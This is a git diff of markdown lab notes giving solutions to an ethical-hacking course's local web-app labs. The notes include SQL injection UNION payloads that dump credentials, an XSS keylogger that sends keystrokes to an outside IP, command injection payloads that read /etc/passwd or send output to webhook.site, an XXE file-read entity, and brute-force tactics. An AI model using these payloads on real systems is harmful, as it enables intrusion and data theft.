@@ -19,14 +19,17 @@ sudo /opt/pimpmykali/pimpmykali.sh
1919# Run menu option E for the WebApp Labs
2020# The labs start automatically
2121
22+ # To START the labs
23+ cd $HOME /peh/labs
24+ ./start-peh-labs.sh
25+
26+ # To (only) STOP the labs
27+ sudo docker stop $( sudo docker ps -aq)
28+
2229# To STOP and CLEANUP the labs
2330cd $HOME /peh/labs
2431./cleanup-peh-labs.sh
2532# This script removes ALL DOCKER CONTAINERS and NETWORKS!!!
26-
27- # To START the labs
28- cd $HOME /peh/labs
29- ./start-peh-labs.sh
3033```
3134
3235- Run Burp Suite and open its proxy browser
@@ -37,35 +40,23 @@ cd $HOME/peh/labs
3740
3841> # Lab solutions
3942>
40- > ## Injection0x01
41- >
42- > - basic SQLi
43- >
44- > ## Injection0x02
45- >
46- > - login as jeremy: jeremy
47- > - check the cookie used as a session token
48- > - break it by adding a '
49- > - notice the page doesn't show the welcome message now that there is a SQL error
50- > - write a script to extract jessamy's password
51- >
5243> ## Injection0x03
5344>
5445> - sushi shop
55- > - product search
46+ > - product search
5647> - UNION select to enum other tables
57- > - find creds & login
58- >
48+ > - find creds & login
49+ >
5950> ### solutions:
60- >
51+ >
6152> ` Tanjyoubi Sushi Rack' UNION SELECT username,password,null,null from injection0x03_users-- - `
62- >
63- > ## XSS 0x01
64- >
65- > ` <img src=x onerror=alert(1);> `
66- >
53+ >
54+ > ## XSS 0x01
55+ >
56+ > ` <img src=x onerror=alert(1);> `
57+ >
6758> ## XSS 0x02
68- >
59+ >
6960> ` <img src=x onerror=alert(1);> `
7061>
7162> ` <script>function logKey(event){fetch("http://10.10.100.146:4444/e?c=" + event.key)} document.addEventListener('keydown', logKey);</script> `
@@ -75,91 +66,91 @@ cd $HOME/peh/labs
7566> ## Command Inj 0x01
7667>
7768> ` https://tcm-sec.com; whoami; asd `
78- > ` ; cat /etc/passwd; asd `
79- >
80- > ## Command Inj 0x02
81- >
82- > ` https://tcm-sec.com/& whoami& asd `
69+ > ` ; cat /etc/passwd; asd `
70+ >
71+ > ## Command Inj 0x02
72+ >
73+ > ` https://tcm-sec.com/& whoami& asd `
8374> ` https://tcm-sec.com/ | sleep 10 | asd `
8475>
8576> ` https://webhook.site/<id>/? ` whoami``
8677>
8778> ## Command Inj 0x03
8879>
8980> ` 45123)^2))}';whoami;# `
90- >
91- > ## File upload 0x01
92- >
93- > - Intercept
81+ >
82+ > ## File upload 0x01
83+ >
84+ > - Intercept
9485> - Change contents
9586> - Or turn off JS
9687>
9788> ## File upload 0x02
9889>
9990> - Bypass the client-side again
100- > - Intercept and change the content-type to image/png or image/jpeg
101- >
102- > ## File upload 0x03
103- >
104- > - Bypass the client-side again
91+ > - Intercept and change the content-type to image/png or image/jpeg
92+ >
93+ > ## File upload 0x03
94+ >
95+ > - Bypass the client-side again
10596> - Intercept and change the content-type again
10697> - Use an extension that's not in the blocklist (.phtml)
107- >
108- > ## Authentication 0x01
109- >
110- > - Brute force
111- >
98+ >
99+ > ## Authentication 0x01
100+ >
101+ > - Brute force
102+ >
112103> ## Authentication 0x02
113104>
114105> - MFA code, switch username (code is OK for all users)
115- > - Or, just brute the code
116- >
106+ > - Or, just brute the code
107+ >
117108> ## Authentication 0x03
118- >
119- > - Account lockout after 5 attempts, therefore brute the top 4 passwords against a username list
120- >
121- > - common password list:
122- >
123- > ```
109+ >
110+ > - Account lockout after 5 attempts, therefore brute the top 4 passwords against a username list
111+ >
112+ > - common password list:
113+ >
114+ > ```
124115> password
125- > password123
116+ >password123
126117> letmein
127118> manchesterunited
128- > ```
129- >
130- > - common usernames list: `/usr/share/seclists/Usernames/Names/names.txt`
131- >
132- > ## XXE, IDOR, capstone
133- >
134- > ### XXE 0x01
135- >
119+ >```
120+ >
121+ >- common usernames list: `/usr/share/seclists/Usernames/Names/names.txt`
122+ >
123+ >## XXE, IDOR, capstone
124+ >
125+ >### XXE 0x01
126+ >
136127> ```
137128> <?xml version="1.0" encoding="UTF-8"?>
138129> <!DOCTYPE creds [
139130> <!ELEMENT creds ANY >]>
140131> <creds><user>username</user><password>pass</password></creds>
141- > ```
142- >
143- > ```
132+ >```
133+ >
134+ >```
144135> <?xml version="1.0" encoding="UTF-8"?>
145- > <!DOCTYPE creds [
136+ ><!DOCTYPE creds [
146137> <!ELEMENT creds ANY >
147- > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
138+ ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
148139> <creds><user>&xxe;</user><password>pass</password></creds>
149140> ```
150- >
141+ >
151142> ### IDOR
152- >
143+ >
153144> `fuzz the parameter`
154145>
155146> - find an admin user (or all of the admin users)
156- >
147+ >
157148> ### Capstone
158- >
149+ >
159150> SQLi to get into admin panel
160151> File upload to get RCE
161- >
162- > - XSS in the message alert
152+ >
153+ >- XSS in the message alert
163154> - XSS in account names probably? need to test
164155>
165156> - brute force user accounts
@@ -169,8 +160,8 @@ cd $HOME/peh/labs
169160> `http://localhost/capstone/coffee.php?coffee=3' or 1=1-- -`
170161>
171162> `http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,username,password,null,null,null,null%20from%20users--%20-`
172- >
173- > # To do list
174- >
163+ >
164+ ># To do list
165+ >
175166> - file upload capstone
176- > - auth0x03 testing
167+ >- auth0x03 testing
0 commit comments